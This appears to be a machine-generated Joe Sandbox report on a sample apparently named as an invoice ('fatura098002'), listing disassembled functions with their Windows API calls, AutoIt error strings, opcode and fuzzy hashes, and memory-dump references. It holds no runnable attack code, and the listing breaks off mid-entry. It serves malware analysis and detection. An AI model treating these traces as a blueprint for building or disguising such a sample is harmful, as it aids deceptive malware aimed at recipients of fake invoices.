API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 6a85c345e1b9eb0e411fe701cc320846324da0315de7ea7d3e7eb1cb12eaae4f
Instruction ID: 9475ae0a1b7d8a4a4ee42fc002dd593fcab466cf7a9d1378545add5c79838c91
Opcode Fuzzy Hash: 6a85c345e1b9eb0e411fe701cc320846324da0315de7ea7d3e7eb1cb12eaae4f
Instruction Fuzzy Hash: 65918171A4021AEBDF24DFA5CC48FAEBBB8EF45710F108559F515AB280D7B89941CFA0

Function 00771187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0077125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00771284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 007712A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007712D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0077135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007713C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00771430

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: f20f8d07825afc0382552ada4aebf60d9ee6996e4198528003fbf1bbd9add52d
Instruction ID: ae14ca0562d77cd7ce8b16b9940ddfeb7ddff0c1689ccc5c99bf531b8ebc9169
Opcode Fuzzy Hash: f20f8d07825afc0382552ada4aebf60d9ee6996e4198528003fbf1bbd9add52d
Instruction Fuzzy Hash: A891BF71A00219EFDF019FA8C888BBE77B5FF45365F548029E944EB292D77CA941CB90

Function 0071948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: e25ce3f8d63f0b8efca2aa2306a87d59838fd51a6805274f9aaa64cac7a6efc8
Instruction ID: a50ad4e5b81404171015228779d232f2db695937a4981d597695a681cc57091c
Opcode Fuzzy Hash: e25ce3f8d63f0b8efca2aa2306a87d59838fd51a6805274f9aaa64cac7a6efc8
Instruction Fuzzy Hash: 33914D71D00219EFCB15CFA9CC84AEEBBB9FF49320F148055E915B7291D378A992CB60

Function 00783947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0078396B
CharUpperBuffW.USER32(?,?), ref: 00783A7A
_wcslen.LIBCMT ref: 00783A8A
VariantClear.OLEAUT32(?), ref: 00783C1F

Part of subcall function 00770CDF: VariantInit.OLEAUT32(00000000), ref: 00770D1F
Part of subcall function 00770CDF: VariantCopy.OLEAUT32(?,?), ref: 00770D28
Part of subcall function 00770CDF: VariantClear.OLEAUT32(?), ref: 00770D34

Strings

AUTOIT.ERROR, xrefs: 00783A80, 00783A85
Incorrect Parameter format, xrefs: 007839A6, 00783BA1

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: eae1e20e913ab99849522f57531fd569dda9513ec76b8537e5c2cffd0d778635
Instruction ID: 3d67220ff4e0e3f63282623901eaf05152ae29c8cc574039fb1d4eb5d663af5b
Opcode Fuzzy Hash: eae1e20e913ab99849522f57531fd569dda9513ec76b8537e5c2cffd0d778635
Instruction Fuzzy Hash: 02913875608305DFCB04EF28C48596ABBE4BF88714F14892DF88997391DB39EE45CB92

Function 00784BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0076000E: CLSIDFromProgID.COMBASE ref: 0076002B
Part of subcall function 0076000E: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00760046
Part of subcall function 0076000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0075FF41,80070057,?,?), ref: 00760054
Part of subcall function 0076000E: CoTaskMemFree.COMBASE(00000000), ref: 00760064

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00784C51
_wcslen.LIBCMT ref: 00784D59
CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,?), ref: 00784DCF
CoTaskMemFree.COMBASE(?), ref: 00784DDA

Strings

NULL Pointer assignment, xrefs: 00784E23, 00784E52

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 5b30dedf95535a86f1b318b3970c07f3779198ebee8e89bc6837c5a1920ba547
Instruction ID: 6f7b19eac0b6b5fb17e2374ac4fa77d202f97e02c2f9f6ef3f70e982cc288637
Opcode Fuzzy Hash: 5b30dedf95535a86f1b318b3970c07f3779198ebee8e89bc6837c5a1920ba547
Instruction Fuzzy Hash: 75912A71D00219EFDF11EFA4D894AEEB7B8BF08310F108269E915A7281DB785A45CF60

Function 007920FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00792183
GetMenuItemCount.USER32(00000000), ref: 007921B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007921DD
_wcslen.LIBCMT ref: 00792213
GetMenuItemID.USER32(?,?), ref: 0079224D
GetSubMenu.USER32(?,?), ref: 0079225B

Part of subcall function 00763A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00763A57
Part of subcall function 00763A3D: GetCurrentThreadId.KERNEL32 ref: 00763A5E
Part of subcall function 00763A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007625B3), ref: 00763A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007922E3

Part of subcall function 0076E97B: Sleep.KERNEL32 ref: 0076E9F3

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 32989bf66c6bdd7e323e20c9cabe4a537e6c9031d8432b0bb2ca34c7025a5ba9
Instruction ID: c02da691e3880042b75ef810b8381c8a7299fce56361038d4af54761d0493522
Opcode Fuzzy Hash: 32989bf66c6bdd7e323e20c9cabe4a537e6c9031d8432b0bb2ca34c7025a5ba9
Instruction Fuzzy Hash: 21715E75A00205EFCF15EF64D845AAEB7F5FF48310F158459E816EB352DB38AD428B90

Function 0076AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0076AEF9
GetKeyboardState.USER32(?), ref: 0076AF0E
SetKeyboardState.USER32(?), ref: 0076AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0076AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0076AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0076AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0076B020

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 83b52e91c038923cc1081deaac57c98e248eb650b1b3fd8534e5b6aba425f987
Instruction ID: 38061849984ea82d457facf333d4095ea81d26e52839b3df763786fe5f66a104
Opcode Fuzzy Hash: 83b52e91c038923cc1081deaac57c98e248eb650b1b3fd8534e5b6aba425f987
Instruction Fuzzy Hash: E951B3A0A047D53DFB3642348C45BBA7EE96B06304F088589F9D6A54C3D3ADECC8DB52

Function 0076ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0076AD19
GetKeyboardState.USER32(?), ref: 0076AD2E
SetKeyboardState.USER32(?), ref: 0076AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0076ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0076ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0076AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0076AE38

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: fb4257d74755fe0b486cf08a0090c690ab8b9fa7343b5e664331cdfdc5436bdd
Instruction ID: 6a6fab3277803ee8febed0b741f77a8699fb2f951c94c90773093c111336971f
Opcode Fuzzy Hash: fb4257d74755fe0b486cf08a0090c690ab8b9fa7343b5e664331cdfdc5436bdd
Instruction Fuzzy Hash: CD51D6B16047D53DFB3783348C96B7A7EE86B46300F088589E5D6668C2D39DEC84DB62

Function 0073542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00743CD6,?,?,?,?,?,?,?,?,00735BA3,?,?,00743CD6,?,?), ref: 00735470
__fassign.LIBCMT ref: 007354EB
__fassign.LIBCMT ref: 00735506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00743CD6,00000005,00000000,00000000), ref: 0073552C
WriteFile.KERNEL32(?,00743CD6,00000000,00735BA3,00000000,?,?,?,?,?,?,?,?,?,00735BA3,?), ref: 0073554B
WriteFile.KERNEL32(?,?,00000001,00735BA3,00000000,?,?,?,?,?,?,?,?,?,00735BA3,?), ref: 00735584

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: afac1b2e4488387c438565d641b8b2be129364a09d1d5a2199b2825f9d4e9621
Instruction ID: 87f9fa225ae789eb4890d3a1874c91534ba8984b1d42f21f0913e5e24a915642
Opcode Fuzzy Hash: afac1b2e4488387c438565d641b8b2be129364a09d1d5a2199b2825f9d4e9621
Instruction Fuzzy Hash: 4951D6709006499FEF11CFA8D845AEEBBFAEF08300F14451AF555E7292E734AA51CB64

Function 007810B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0078304E: inet_addr.WS2_32(?), ref: 0078307A
Part of subcall function 0078304E: _wcslen.LIBCMT ref: 0078309B

socket.WS2_32(00000002,00000001,00000006), ref: 00781112
WSAGetLastError.WS2_32 ref: 00781121
WSAGetLastError.WS2_32 ref: 007811C9
closesocket.WS2_32(00000000), ref: 007811F9

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 6e4538e37b457e47fcc4336e23ee81d762ee841d53e48c18fed2051f0d9e4f2a
Instruction ID: a5c8a2407afab7c99b07a49fe6686a3c209f730ee094fd908448eafd70813fe6
Opcode Fuzzy Hash: 6e4538e37b457e47fcc4336e23ee81d762ee841d53e48c18fed2051f0d9e4f2a
Instruction Fuzzy Hash: C541E531A00208EFDB11AF54CC88BA9B7E9EF45364F548159FD159B291C778ED42CBE1

Function 0076CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0076DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0076CF22,?), ref: 0076DDFD

Part of subcall function 0076DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0076CF22,?), ref: 0076DE16

lstrcmpiW.KERNEL32(?,?), ref: 0076CF45
MoveFileW.KERNEL32(?,?), ref: 0076CF7F
_wcslen.LIBCMT ref: 0076D005
_wcslen.LIBCMT ref: 0076D01B
SHFileOperationW.SHELL32(?), ref: 0076D061

Strings

\*.*, xrefs: 0076CFF3

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: a77bffcb12a425f5f76214ca2538cee7b27f2cd23f63e99087026aae6167465a
Instruction ID: ee4e20eb40895ec412b8c3cf5ec803f99d8f593502c14c3306f20c78547e1f2b
Opcode Fuzzy Hash: a77bffcb12a425f5f76214ca2538cee7b27f2cd23f63e99087026aae6167465a
Instruction Fuzzy Hash: C1415772D45118DFDF17EBA4D985AEEB7B9AF08380F0400E6E546E7141EB38AA85CB50

Function 00792DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00792E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00792E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00792E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00792EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00792EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00792EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00792F0B

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: d62fb6fe19a55d69c8a31a47a5a84cdcd25bf12174366ecfddbbb910f09393cd
Instruction ID: 9b81114319757fa9c3182780e653615d8fc38ca14d53f91808aa87099f4393c5
Opcode Fuzzy Hash: d62fb6fe19a55d69c8a31a47a5a84cdcd25bf12174366ecfddbbb910f09393cd
Instruction Fuzzy Hash: 18311235605240AFEF21EF18ECD8F6537E1EB8A710F5541A6F9008B2B2CB79A842DB54

Function 00767726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00767769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0076778F
SysAllocString.OLEAUT32(00000000), ref: 00767792
SysAllocString.OLEAUT32(?), ref: 007677B0
SysFreeString.OLEAUT32(?), ref: 007677B9
StringFromGUID2.COMBASE(?,?,00000028), ref: 007677DE
SysAllocString.OLEAUT32(?), ref: 007677EC

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: ccecc2384cb875c2f600289fefe001cf11a38657d54c164443c6fd28e3fbfd0a
Instruction ID: 82e9e613b198c458651b086f0c10739708f55113cc1c9279bb6a8b08fc0a81e1
Opcode Fuzzy Hash: ccecc2384cb875c2f600289fefe001cf11a38657d54c164443c6fd28e3fbfd0a
Instruction Fuzzy Hash: 1E21A476604219AFDF14DFA8CD88CBB77ACEB097A87048026FD15DB1A0D678DC46C764

Function 007677FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00767842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00767868
SysAllocString.OLEAUT32(00000000), ref: 0076786B
SysAllocString.OLEAUT32 ref: 0076788C
SysFreeString.OLEAUT32 ref: 00767895
StringFromGUID2.COMBASE(?,?,00000028), ref: 007678AF
SysAllocString.OLEAUT32(?), ref: 007678BD

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 868738fb607129b4f4a945e84e976edd6e6f04d1c9ecbdbc11f0aa4f18e11a91
Instruction ID: 3c4e39ace994e4506a9051f4e89494a09035c0acaeb937cb69d78239e7a14568
Opcode Fuzzy Hash: 868738fb607129b4f4a945e84e976edd6e6f04d1c9ecbdbc11f0aa4f18e11a91
Instruction Fuzzy Hash: 16218371608205AFDF159FB8DC8CDBA77ECEB097A47108125F916CB2A1D678DC81CB68

Function 007704D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 007704F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0077052E

Strings

nul, xrefs: 00770567

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
